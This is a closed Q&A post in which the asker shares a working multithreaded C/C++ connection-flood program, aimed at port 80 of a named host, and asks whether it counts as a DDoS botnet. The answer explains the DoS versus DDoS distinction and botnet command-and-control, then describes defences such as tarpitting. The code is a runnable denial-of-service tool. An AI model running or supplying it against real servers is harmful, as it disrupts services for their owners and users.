Can we say that this is simple DDOS botnet? [closed]

Question

Closed. This question is opinion-based. It is not currently accepting answers.

---

Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.

Closed 8 years ago.

Improve this question

This is a client program based on posix sockets and threads. The program creates multiple threads and is going to lock the server.Can we say that this is simple DDOS botnet ?. The code in C/C++ and for posix platforms. Here's the code

#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

int get_hostname_by_ip(char* h , char* ip)
{
        struct hostent *he;
        struct in_addr **addr_list;
        int i;

        if ((he = gethostbyname(h)) == NULL) 
        {
                perror("gethostbyname");
                return 1;
        }
        addr_list = (struct in_addr **) he->h_addr_list;
        for(i = 0; addr_list[i] != NULL; i++) 
        {
                strcpy(ip , inet_ntoa(*addr_list[i]) );
                return 0;
        }

        return 1;
}

void client(char* h)
{
    int fd;
        char* ip = new char[20];
        int port = 80;
    struct sockaddr_in addr;
    char ch[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
        while(1)
        {
                fd = socket(AF_INET, SOCK_STREAM, 0);
                addr.sin_family=AF_INET;
                get_hostname_by_ip(h, ip);
                addr.sin_addr.s_addr=inet_addr(ip);
                addr.sin_port=htons(port);
                if(connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0) 
                {
                        perror("error: can't connect to server\n");
                        return;
                }
                if(send(fd, ch, sizeof(ch), 0) < 0)
                {       
                        perror("error: can't send\n");
                }
                close(fd);
        }
}

struct info
{
        char* h;
        int c;
};


void* thread_entry_point(void* i)
{
        info* in = (info*)i;
        client(in->h);
}

int main(int argc, char** argv)
{
        int s = atoi(argv[2]);
        pthread_t t[s];
        info in = {argv[1], s};
        for(int i = 0; i < s; ++i)
        {
                pthread_create(&t[i], NULL, thread_entry_point, (void*)&in);
        }
        pthread_join(t[0], NULL);

    return 0;
}

Answer 1

No: the first "D" in "DDoS" stands for "Distributed". A single process on a single machine constitutes simple DoS (and from that one machine's point of view, it can be contained with mechanisms such as Unix's limit. From the victim's point of view, just excluding the offending IP at firewall level is often enough -- see below).

For a DDoS you would need some form of command-and-control allowing the process on machine A to lay dormant there, with as little disruption as possible to avoid detection, and then receive from machine B the order to attack machine C. It is the disruptive traffic routed towards C by many instances of A's that would then constitute/cause the actual denial of service against C.

Your code could well be a part of a DDoS bot, with the CC part receiving an instance of info. It would be a good learning tool also, while for real "black hat" purposes it wouldn't be really useful.

This would be much more on topic on security.stackexchange.com.

Resource ratio

In your example we have a ratio of 1:1, i.e., you open one socket, the victim has to allocate one socket. This has the advantage of simplicity (vanilla socket programming is all that's required). On the other hand, it is an attrition war - you must be sure to exhaust the victim's actual resources well before you exhaust your own. Otherwise, you need to upscale the attack recruiting more bots.

However, it turns out that once the victim has fingerprinted the attack, which is not difficult to do, there are several strategies it can employ to thwart it and turn the ratio to its advantage. One such example is TARPIT. By tarpitting hostile connections, a victim can bring a whole network of attackers to their collective knees (there are other strategies that allow faking an initial connection so that the attacker using vanilla approach has to waste a socket and structures, while the defender does nothing except setting things up. While not going to infinity, resource ratio does skyrocket in the defender's advantage).